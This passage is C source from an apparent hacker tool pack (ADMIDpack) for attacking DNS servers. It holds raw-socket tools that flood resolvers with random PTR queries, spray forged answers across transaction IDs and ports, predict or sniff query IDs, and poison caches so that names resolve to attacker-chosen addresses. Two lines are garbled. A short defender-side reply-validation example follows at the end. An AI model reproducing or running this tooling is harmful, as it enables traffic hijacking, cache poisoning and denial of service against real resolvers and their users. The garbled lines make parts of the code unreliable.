    *((u_short *)(data+i)) = htons(TYPE_PTR);
    *((u_short *)(data+i+2)) = htons(1);
    *((u_long *)(data+i+4)) = 9999999;
    *((u_short *)(data+i+8)) = htons(strlen(tmp)+1);
    strcpy((data+i+10),tmp);
    return(i+10+strlen(tmp)+1);
  }
}

void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
{
  struct dnshdr *dns;
  char buff[1024];
  char *data;
  int i;
  int on=1;
  int sraw;

  if ((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
    perror("socket");
    exit(ERROR);
  }

  if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
    perror("setsockopt");
    exit(ERROR);
  }

  dns = (struct dnshdr *)buff;
  data = (char *)(buff+DNSHDRSIZE);
  bzero(buff,sizeof(buff));

  dns->id = 6000+myrand();
  dns->qr = 0;
  dns->rd = 1;
  dns->aa = 0;
  dns->que_num = htons(1);
  dns->rep_num = htons(0);

  i=makepaketQS(data,name,type);
  udp_send(sraw,s_ip,d_ip,1200+myrand(),53,buff,DNSHDRSIZE+i);
  close(sraw);
}


void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type)
{
  struct dnshdr *dns;
  char buff[1024];
  char *data;
  int i;
  int on=1;
  int sraw;

  if ((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
    perror("socket");
    exit(ERROR);
  }

  if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
    perror("setsockopt");
    exit(ERROR);
  }

  dns = (struct dnshdr *)buff;
  data = (char *)(buff+DNSHDRSIZE);
  bzero(buff,sizeof(buff));

  dns->id = htons(ID);
  dns->qr = 1;
  dns->rd = 1;
  dns->aa = 1;
  dns->que_num = htons(1);
  dns->rep_num = htons(1);
  i=makepaketAW(data,name,spoofip,type);
  printf(" I apres Makepaket == %i \n",i);

  udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i);
  close(sraw);
}

void dnsspoof(char *dnstrust,char *victim,char *spoofname, char *spoofip,int ID,int type)
{
  struct dnshdr *dns;
  char buff[1024];
  char *data;
  u_long fakeip;
  u_long trustip;
  u_long victimip;
  int loop, rere;

  dns = (struct dnshdr *)buff;
  data = (char *)(buff+DNSHDRSIZE);
  trustip = host2ip(dnstrust);
  victimip = host2ip(victim);
  fakeip = host2ip("12.1.1.0");
  /* send question ... */
  if( type == TYPE_PTR)
    for(loop=0;loop<4;loop++) sendquestion(fakeip,victimip,spoofip,type);
  if( type == TYPE_A)
    for(loop=0;loop<4;loop++)
      sendquestion(fakeip,victimip,spoofname,type);
  /* now its time to awnser Quickly !!! */
  for(rere = 0; rere < 2;rere++) {
    for(loop=0; loop < 80; loop++) {
      printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
             dnstrust,victim,spoofname,spoofip,ID+loop,type);
      sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
    }
  }
}
<-->
<++> ADMIDpack/ADMdnsfuckr.c
/* ADM DNS DESTROYER */

#define DNSHDRSIZE 12
#define VERSION "0.22 pub"
#define ERROR -1

#include <stdio.h>
#include <stdlib.h>
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

void main(int argc, char **argv)
{
 struct dnshdr *dns;
 char *data;
 char buffer2[4000];
 unsigned char namez[255];
 unsigned long s_ip;
 unsigned long d_ip;
 int sraw,on=1;

 if(argc <2) {printf(" usage : %s <host> \n",argv[0]); exit(0); }
 dns = (struct dnshdr *)buffer2;
 data = (char *)(buffer2+12);

 bzero(buffer2,sizeof(buffer2));

 if((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
  perror("socket");
  exit(ERROR);
 }

 if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
  perror("setsockopt");
  exit(ERROR);
 }

 printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION);
 printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n");
 sleep(1);

 s_ip=host2ip("100.1.2.3");
 d_ip=host2ip(argv[1]);

 dns->id = 123;
 dns->rd = 1;
 dns->que_num = htons(1);

 while(1) {
  sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
  printf("%s\n",namez);
  strcpy(data,namez);
  *((u_short *)(data+strlen(namez)+1)) = ntohs(12);
  *((u_short *)(data+strlen(namez)+3)) = ntohs(1);
  udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
  s_ip=ntohl(s_ip);
  s_ip++;
  s_ip=htonl(s_ip);
 }
}
<-->

<++> ADMIDpack/ADMkillDNS.c

#define ERROR -1
#define VERSION "0.3 pub"
#define ID_START 0
#define ID_STOP 65535
#define PORT_START 53
#define PORT_STOP 54

#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

void main(int argc, char **argv)
{
 struct dnshdr *dns;
 char *data;
 char buffer2[4000];
 unsigned char namez[255];
 unsigned long s_ip,s_ip2;
 unsigned long d_ip,d_ip2;
 int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;

 if(argc <5) {
  system("/usr/bin/clear");
  printf(" usage : %s <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP]\n\t[PORT START] [PORT STOP] \n",argv[0]);
  printf(" ip src: ip source of the dns anwser\n");
  printf(" ip dst: ip of the dns victim\n");
  printf(" name : spoof name ex: www.dede.com\n");
  printf(" ip : the ip associate with the name\n");
  printf(" options \n");
  printf(" [A,B,N] \n");
  printf(" A: flood the DNS victim with multiple query\n");
  printf(" B: DOS attack for destroy the DNS \n");
  printf(" N: None attack \n\n");
  printf(" [ID_START] \n");
  printf(" ID_START: id start :> \n\n");
  printf(" [ID_STOP] \n");
  printf(" ID_STOP: id stop :> \n\n");
  printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n");
  printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION);
  exit(ERROR);
 }

 dns = (struct dnshdr *)buffer2;
 data = (char *)(buffer2+DNSHDRSIZE);

 bzero(buffer2,sizeof(buffer2));

 if((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
  perror("socket");
  exit(ERROR);
 }

 if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
  perror("setsockopt");
  exit(ERROR);
 }

 printf("ADMkillDNS %s",VERSION);
 printf("\nouais ben mwa je dedie ca a ma Heike");
 printf("\nREADY FOR ACTION! \n");

 s_ip2=s_ip=host2ip(argv[1]);
 d_ip2=d_ip=host2ip(argv[2]);

 if (argc>5) if (*argv[5]=='A')
 {
  for(loop=0;loop<10;loop++) {
   dns->id = 6000+loop;
   dns->qr = 0;
   dns->rd = 1;
   dns->aa = 0;
   dns->que_num = htons(1);
   dns->rep_num = htons(0);
   i=makepaketQS(data,argv[3],TYPE_A);
   udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i);
   s_ip=ntohl(s_ip);
   s_ip++;
   s_ip=htonl(s_ip);
  }
 } /* end of DNS flood query */

 /* here we find the routine for a DoS */

 if (argc>5) if (*argv[5]=='B')
 {
  s_ip=host2ip("100.1.2.3");
  dns->id = 123;
  dns->rd = 1;
  dns->que_num = htons(1);

  printf("plz enter the number of packet u wanna send\n");
  scanf("%i",&i);
  for(x=0;x<i;x++) {
   sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
   strcpy(data,namez);
   *((u_short *)(data+strlen(namez)+1)) = ntohs(12);
   *((u_short *)(data+strlen(namez)+3)) = ntohs(1);
   udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
   s_ip=ntohl(s_ip);
   s_ip++;
   s_ip=htonl(s_ip);
   printf("send packet num %i:%i\n",x,i);
  }
 } /* end of DNS DOS */

 if(argc > 6 )idstart = atoi(argv[6]);
 else
  idstart = ID_START;
 if(argc > 7 )idstop = atoi(argv[7]);
 else
  idstop = ID_STOP;

 if(argc > 8 ){
  portstart = atoi(argv[8]);
  portstop = atoi(argv[9]);
 }
 else {
  portstart = PORT_START;
  portstop = PORT_STOP;
 }

 bzero(buffer2,sizeof(buffer2));
 bzero(namez,sizeof(namez));
 i=0;
 x=0;
 s_ip=s_ip2;
 d_ip=d_ip2;

 for(;idstart<idstop;idstart++) {
  dns->id = htons(idstart);
  dns->qr = 1;
  dns->rd = 1;
  dns->aa = 1;
  dns->que_num = htons(1);
  dns->rep_num = htons(1);

  printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop);

  i=makepaketAW(data,argv[3],argv[4],TYPE_A);
  for(;x < portstop; x++)
   udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
  x = portstart;
 }

 printf(" terminated..\n");
}

<-->

<++> ADMIDpack/ADMnOg00d.c

/**************************/
/*   ADMnog00d (c) ADM    */
/**************************/
/*  ADM DNS ID PREDICTOR  */
/**************************/

#include <fcntl.h>
#include <unistd.h>
#include "dns.h"
#include "ADM-spoof.c"
#include "ADMDNS2.c"

#define VERSION "0.7 pub"
#define SPOOFIP "4.4.4.4"
#define ERROR -1
#define LEN sizeof(struct sockaddr)
#define UNDASPOOF "111.111.111.111"
#define TIMEOUT 300
#define DNSHDRSIZE 12

void usage()
{
 printf(" ADMnoGOOD <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n");
 printf("\n ex: ADMnoG0O0d ppp.evil.com nsl.victim.com provnet.fr ns.victim.com 1 mouhhahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
 printf(" we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7 \n");
 printf(" we use provnet.fr and nsl.provnet for find ID of ns.victim.com\n");
 printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n");
 printf(" for more information..\n");
 printf(" check ftp.janova.org/pub/ADM/ \n");
 printf(" ADM@janova.org \n");
 printf(" ask Heike from me...:) \n");
 exit(ERROR);
}

void senddnspkt(s,d_ip,wwwname,ip,dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
 struct sockaddr_in sin;
 int i;
 char buffer[1024];
 char *data;
 bzero(buffer,sizeof(buffer));
 memcpy(buffer,dns,DNSHDRSIZE);
 data = (char *)(buffer+DNSHDRSIZE);

 if(dns->qr == 0)
 {
  i=makepaketQS(data,wwwname,TYPE_A);
  sin.sin_family = AF_INET;
  sin.sin_port = htons(53);
  sin.sin_addr.s_addr = d_ip;
  sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
 }
 else
 {
  i=makepaketAW(data,wwwname,ip,TYPE_A);
  sin.sin_family = AF_INET;
  sin.sin_port = htons(53);
  sin.sin_addr.s_addr = d_ip;
  sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
 }
}

void dns_qs_no_rd(s,d_ip,wwwname,ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
 struct dnshdr *dns;
 char *data;
 char buffer[1024];
 int i;

 dns = (struct dnshdr *)buffer;
 data = (char *)(buffer+DNSHDRSIZE);

 bzero(buffer,sizeof(buffer));

 dns->id = htons(ID);
 dns->qr = 0;
 dns->rd = 0; /* dont want the recursion !! */
 dns->aa = 0;
 dns->que_num = htons(1);
 dns->rep_num = htons(0);
 i=makepaketQS(data,wwwname,TYPE_A);
 senddnspkt(s,d_ip,wwwname,NULL,dns);
}

void main(int argc, char **argv)
{
 struct sockaddr_in sin_rcp;
 struct dnshdr *dns, *dns_recv;
 char *data, *data2;
 char buffer2[4000];
 char buffer[4000];
 char spoofname[255];
 char spoofip[255];
 char dnstrust[255];
 char bla[255];
 char *alacon;
 unsigned char fakename[255];
 unsigned char namez[255];
 unsigned long s_ip, s_ip2;
 unsigned long d_ip, d_ip2, trust;
 unsigned int DA_ID = 65535, loop = 65535;
 int sraw, s_r, i, on=1, x, ID,timez;
 int len = sizeof(struct sockaddr);

 dns_recv = (struct dnshdr *)(buffer);
 data2 = (char *)(buffer+DNSHDRSIZE);
 dns = (struct dnshdr *)buffer2;
 data = (char *)(buffer2+DNSHDRSIZE);

 bzero(buffer2,sizeof(buffer2));
 srand(time(NULL));

 if((s_r=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == ERROR ) {
  perror("socket");
  exit(ERROR);
 }

 if((fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ) {
  perror("fcntl");
  exit(ERROR);
 }

 if((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR ) {
  perror("socket");
  exit(ERROR);
 }

 if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)) {
  perror("setsockopt");
  exit(ERROR);
 }

 if(argc < 2) usage();

 if(argc > 9 )DA_ID = loop = atoi(argv[9]);
 if(argc > 6)strcpy(spoofname,argv[6]);
 else{
  printf("enter the name you wanna spoof:");
  scanf("%s",spoofname);
 }

 if(argc > 7)strcpy(bla,argv[7]);
 else{
  printf("enter the ip's of the spoof name:");
  scanf("%s",bla);
 }

 alacon =(char *)inet_ntoa(host2ip(bla));
 strcpy(spoofip,alacon);

 if( argc > 8 ) strcpy(bla,argv[8]);
 else{
  printf("enter the DNS trust of the victim:");
  scanf("%s",bla);
 }

 alacon =(char *)inet_ntoa(host2ip(bla));
 strcpy(dnstrust,alacon);

 printf("ADMnoGO00d %s\n",VERSION);
 printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n");
 sleep(1);
 printf("\nLets Play =)!!\n");

 /* save some param */
 s_ip2 = host2ip(argv[1]);
 d_ip2 = d_ip = host2ip(argv[4]);
 trust = host2ip(argv[2]);
 s_ip = host2ip(UNDASPOOF);
 while(1) {
  sprintf (fakename, "%$1%1%1%1%1%1.%38s",
  sendquestion(s_ip,d_ip,fakename,TYPE_A);
  /* end of question packet */

  bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
  bzero(namez,sizeof(namez));
  i=0;
  x=0;

  /* here start the spoof anwser */
  ID = loop;
  for(;loop >= ID-10 ;loop--) {
   dns->id = htons(loop);
   dns->qr = 1;
   dns->rd = 1;
   dns->aa = 1;
   dns->que_num = htons(1);
   dns->rep_num = htons(1);
   i=makepaketAW(data,fakename,SPOOFIP,TYPE_A);
   udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i);
  }

  bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
  bzero(namez,sizeof(namez));
  i=0;
  x=0;
  /* time for test spoof */
  dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */
                                             /* non recursive ! */
  /* we waiting for awnser ... */
  while(1) {
   for(timez=0;timez < TIMEOUT; timez++) {
    if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 )
    {
     printf("ok whe have the reponse ;)\n");
     timez = 0;
     break;
    }
    usleep(10);
    timez++;
   }
   if(timez != 0){
    printf("hum no reponse from the NS ressend question..\n");
    dns_qs_no_rd(s_r,d_ip2,fakename,myrand());
   }
   else break;
  }

  /* ok we have a awnser */
  printf("fakename = %s\n",fakename);
  if (sin_rcp.sin_addr.s_addr == d_ip2 )
  if(sin_rcp.sin_port == htons(53) )
  {
   if( dns_recv->qr == 1 )
   if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */
    printf("try %i < ID < %i \n",ID-10,ID);
   else{
    /* Hoho we have the spoof has worked we have found the right ID ! */
    printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop);
    printf("let's send the spoof...\n");
    dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5]));
    printf("spoof sended ...\n");
    exit(0);
   }
  } /* end of if (sin_rcp.sin_port == htons(53) ) */

  bzero(buffer,sizeof(buffer));
 } /* end of while loop */
}/* end of proggies */

<-->
<++> ADMIDpack/ADMsnOOfID.c
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#include <pcap.h>
#include <net/if.h>

#define DNSHDRSIZE 12
#define SPOOF WT 2-750. e 0a"
#define VERSION "ver 0.6 pub"
#define ERROR -1

int ETHHDRSIZE;

void main(argc, argv)
int argc;
char *argv[];
{
 struct pcap_pkthdr h;
 struct pcap *pcap_d;
 struct iphdr *ip;
 struct udphdr *udp;
 struct dnshdr *dnsrecv, *dnssend;
 char *data;
 char *data2;
 char *buffer;
 char namefake[255];
 char buffer2[1024];
 char ebuf[255];
 char spoofname[255];
 char spoofip[255];
 char bla[255];
 char dnstrust[255];
 char *alacon;
 unsigned long s_ipns;
 unsigned long d_ip;
 int sraw, i, on=1, con, ID,DA_ID,type;

 srand((time(NULL) % random() * random()));

 if(argc <2) {
  printf("usage : %s <device> <ns.victim.com> <your domain> <IP of ur NS> <type 1,12> <spoofname> <spoof ip> <ns trust> \n",argv[0]);
  printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]);
  printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if soml asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n");
  exit(0);
 }

 if (strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
 else ETHHDRSIZE = 14;

 if (argc>5) type=atoi(argv[5]);

 if(argc > 6)strcpy(spoofname,argv[6]);
 else{
  printf("enter the name you wanna spoof:");
  scanf("%s",spoofname);
 }

 if(argc > 7)strcpy(bla,argv[7]);
 else{
  printf("enter the ip's of the spoof name:");
  scanf("%s",bla);
 }
 alacon =(char *)inet_ntoa(host2ip(bla));
 strcpy(spoofip,alacon);

 if(argc > 8)strcpy(bla,argv[8]);
 else{
  printf("enter the dns trust for the spoof\n");
  scanf("%s",bla);
 }

 alacon =(char *)inet_ntoa(host2ip(bla));
 strcpy(dnstrust,alacon);

 dnssend = (struct dnshdr *)buffer2;
 data2 = (char *)(buffer2+DNSHDRSIZE);
 bzero(buffer2,sizeof(buffer2));

 if((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
  perror("socket");
  exit(ERROR);
 }

 if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
  perror("setsockopt");
  exit(ERROR);
 }

 printf("ADMsn0OofID.c %s ADM ID sniffer\n",VERSION);
 printf("ADMsnOOfID (\033[5m\033[01mc\033[0m) ADM, Heike\n");
 sleep(1);

 pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);

 s_ipns = host2ip(argv[4]);
 d_ip = host2ip(argv[2]);
 con = myrand();

 /* make the question for get the ID */
 sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]);
 dnssend->id = 2600;
 dnssend->qr = 0;
 dnssend->rd = 1;
 dnssend->aa = 0;
 dnssend->que_num = htons(1);
 dnssend->rep_num = htons(0);

 i = makepaketQS(data2,namefake,TYPE_A);
 udp_send(sraw,s_ipns,d_ip,2600+con,53,buffer2,DNSHDRSIZE+i);
 printf("Question sended...\n");
 printf("Its Time to w8 \n");

 while(1)
 {
  buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */
  ip = (struct iphdr *)(buffer+ETHHDRSIZE);
  udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
  dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
  data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
  if(ip->protocol == IPPROTO_UDP) {
   printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source));
   printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest));
  }
  if (ip->protocol == 17 )
  if(ip->saddr.s_addr == d_ip )
  if (ip->daddr.s_addr == s_ipns )
  if(udp->dest == htons(53) )
  if (dnsrecv->qr == 0 )
  {
   printf("kewl :)~ we have the packet !\n");
   ID = dnsrecv->id ; /* we get the id */
   printf("the current id of %s is %d \n",argv[2],ntohs(ID));
   DA_ID = ntohs(ID);
   printf("send the spoof...\n");
   dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type);
   printf("spoof sended...\n");
   exit(0);
  }
 }
 /* well now we have the ID we cant predict the ID */
}
<-->
<++> ADMIDpack/ADMsniffID.c

#include <pcap.h>
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "ver 0.4 pub"

int ETHHDRSIZE;

void usage() {
 printf("usage : ADMsniffID <device> <IP> <name> <type of spoof[1,12]> \n");
 printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n");
 exit(ERROR);
}

void main(int argc, char **argv)
{
 struct pcap_pkthdr h;
 struct pcap *pcap_d;
 struct iphdr *ip;
 struct udphdr *udp;
 struct dnshdr *dnsrecv, *dnssend;
 char *data;
 char *data2;
 char *buffer;
 char SPOOFIP[255];
 char bla[255];
 char spoofname[255];
 char tmp2[255];
 char ebuf[255];
 char buffer2[1024];
 unsigned char namez[255];
 int sraw,on=1,tmp1,type;

 if(argc <2)usage();
 if (strstr(argv[1],"ppp0")) ETHHDRSIZE = 0;
 else ETHHDRSIZE = 14;

 strcpy(SPOOFIP,argv[2]);
 strcpy(spoofname,argv[3]);
 type = atoi(argv[4]);

 /* Buffer 'n' tcp/ip stuff */
 dnssend = (struct dnshdr *)buffer2;
 data2 = (char *)(buffer2+12);
 /* bzero(buffer,sizeof(buffer)); */

 bzero(bla,sizeof(bla));
 bzero(buffer2,sizeof(buffer2));

 if((sraw=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR) {
  perror("socket");
  exit(ERROR);
 }

 if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
  perror("setsockopt");
  exit(ERROR);
 }

 /* open pcap descriptor */
 pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf);

 printf("ADMsniffID %s (c) ADMnHeike\n",VERSION);
 while(1) {
  buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */
  ip = (struct iphdr *)(buffer+ETHHDRSIZE);
  udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
  dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
  data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
  if (ip->protocol == 17)
  if (udp->dest == htons(53) )
  if (dnsrecv->qr == 0)
  {
   strcpy(namez,data);
   nameformat(namez,bla);
   printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla);
   bzero(bla,sizeof(bla));
   printf("the question have the type %i and type of the query %i\n"
          ,ntohs(*((u_short *)(data+strlen(data)+1)))
          ,ntohs(*((u_short *)(data+strlen(data)+2+1))));

   /* well in diz version we only spoof the type 'A' */
   /* check out for a new version in ftp.janova.org/pub/ADM */
   printf("make the spoof packet...\n");
   printf("dns header\n");

   /* here we gonna start to make the spoofed paket :)*/
   memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5);

   dnssend->id=dnsrecv->id;      /* haha the ID ;) */
   dnssend->aa=1;                /* i've the authority */
   dnssend->ra=1;                /* i've the recursion */
   dnssend->qr=1;                /* its a answer */
   dnssend->rep_num = htons(1);  /* i've one awnser */
   printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n"
          ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num));
   printf("Question..\n");
   printf("domainename=%s\n",data2);
   printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1))));
   printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2))));
   if( type == TYPE_PTR) {
    tmp1=strlen(namez)+5;
    strcpy(data2+tmp1,namez);
    tmp1=tmp1+strlen(namez)+1;
    bzero(tmp2,sizeof(tmp2));
    nameformat(spoofname,tmp2);
    printf("tmp2 = %s\n",tmp2);
    printf(" mouhahahah \n");
    *((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
    *((u_short *)(data2+tmp1+2)) = htons(1);
    *((u_long *)(data2+tmp1+2+2)) = htonl(86400);
    *((u_short *)(data2+tmp1+2+2+4)) = htons(strlen(tmp2)+1);
    printf("bhaa?.\n");
    strcpy((data2+tmp1+2+2+4+2),tmp2);
    printf(" ouf !! =) \n");
    tmp1 = tmp1+strlen(tmp2)+1;
   }
   if( type == TYPE_A){
    tmp1=strlen(namez)+5;
    strcpy(data2+tmp1,namez);
    tmp1=tmp1+strlen(namez)+1;
    *((u_short *)(data2+tmp1)) = htons(TYPE_A);
    *((u_short *)(data2+tmp1+2)) = htons(1);
    *((u_long *)(data2+tmp1+2+2)) = htonl(86400);
    *((u_short *)(data2+tmp1+2+2+4)) = htons(4);
    *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP);
   }
   printf("Answer..\n");
   printf("domainename=%s\n",tmp2);
   printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1))));
   printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2))));
   printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2))));
   printf("data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4))));
   printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
   tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */
                        /* without the dnshdr */

   udp_send(sraw
           ,ip->daddr
           ,ip->saddr
           ,ntohs(udp->dest)
           ,ntohs(udp->source)
           ,buffer2
           ,DNSHDRSIZE+tmp1);
  } /* end of the spoof */
 } /* end of while(1) */
} /* The End !! ;) */

<-->
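Added defender-side example, not part of ADMIDpack: the check a resolver (or an IDS watching port 53) has to run on every incoming reply against the query it actually sent. The blind answers sprayed above (sequential IDs in ADMkillDNS and ADMnOg00d, a port range, the question name copied into the answer RR) only get in if the ID and the source port are both guessed right, which is exactly why those two values must be unpredictable. The `pending_query` struct, the sample packet bytes and the names in it are constructed for this example; CNAME chains are out of scope.

```c
/* Added defender-side example, not part of ADMIDpack: validate a DNS reply
 * against the query a resolver actually sent.  Sample bytes and the struct
 * below are constructed for this example. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define DNS_HDR_LEN 12

enum verdict { DNS_OK = 0, DNS_MALFORMED, DNS_NOT_RESPONSE, DNS_BAD_ID,
               DNS_BAD_PORT, DNS_QNAME_MISMATCH, DNS_QTYPE_MISMATCH,
               DNS_ANSWER_NAME_MISMATCH };

/* Per-outstanding-query state: exactly the tuple a blind spoofer must guess. */
struct pending_query {
    uint16_t id;            /* transaction ID we sent */
    uint16_t server_port;   /* port we sent to; the reply must come from it */
    const char *qname;      /* dotted name we asked for */
    uint16_t qtype;
};

/* Big-endian 16-bit read: no ntohs(), no unaligned u_short casts. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Decode a label-encoded name (\3www\7example\3com\0, what nameformat()
 * produces) into dotted text.  Returns bytes consumed or -1.  Compression
 * pointers are rejected: the packets above never use them, and following
 * them without a loop check is a classic parser bug. */
static int read_name(const uint8_t *pkt, int len, int off, char *out, int outsz)
{
    int pos = off, o = 0;
    for (;;) {
        if (pos >= len) return -1;
        int l = pkt[pos++];
        if (l == 0) break;
        if (l & 0xC0) return -1;
        if (pos + l > len || o + l + 1 >= outsz) return -1;
        if (o) out[o++] = '.';
        memcpy(out + o, pkt + pos, (size_t)l);
        o += l;
        pos += l;
    }
    out[o] = '\0';
    return pos - off;
}

/* DNS_OK only if ID, source port and echoed question all match and every
 * answer RR is owned by the queried name (CNAME chains not handled here). */
int check_response(const uint8_t *pkt, int len, uint16_t src_port,
                   const struct pending_query *q)
{
    char name[256];
    int n, pos = DNS_HDR_LEN;

    if (len < DNS_HDR_LEN) return DNS_MALFORMED;
    if (!(pkt[2] & 0x80)) return DNS_NOT_RESPONSE;      /* QR bit clear */
    if (rd16(pkt) != q->id) return DNS_BAD_ID;
    if (src_port != q->server_port) return DNS_BAD_PORT;
    if (rd16(pkt + 4) != 1) return DNS_MALFORMED;        /* qdcount != 1 */

    if ((n = read_name(pkt, len, pos, name, sizeof name)) < 0) return DNS_MALFORMED;
    pos += n;
    if (pos + 4 > len) return DNS_MALFORMED;
    if (strcasecmp(name, q->qname) != 0) return DNS_QNAME_MISMATCH;
    if (rd16(pkt + pos) != q->qtype) return DNS_QTYPE_MISMATCH;
    pos += 4;

    /* Each answer RR: owner name, type, class, TTL, rdlength, rdata. */
    for (uint16_t i = 0, an = rd16(pkt + 6); i < an; i++) {
        if ((n = read_name(pkt, len, pos, name, sizeof name)) < 0) return DNS_MALFORMED;
        pos += n;
        if (pos + 10 > len) return DNS_MALFORMED;
        if (strcasecmp(name, q->qname) != 0) return DNS_ANSWER_NAME_MISMATCH;
        pos += 10 + rd16(pkt + pos + 8);                 /* skip rdata */
        if (pos > len) return DNS_MALFORMED;
    }
    return DNS_OK;
}

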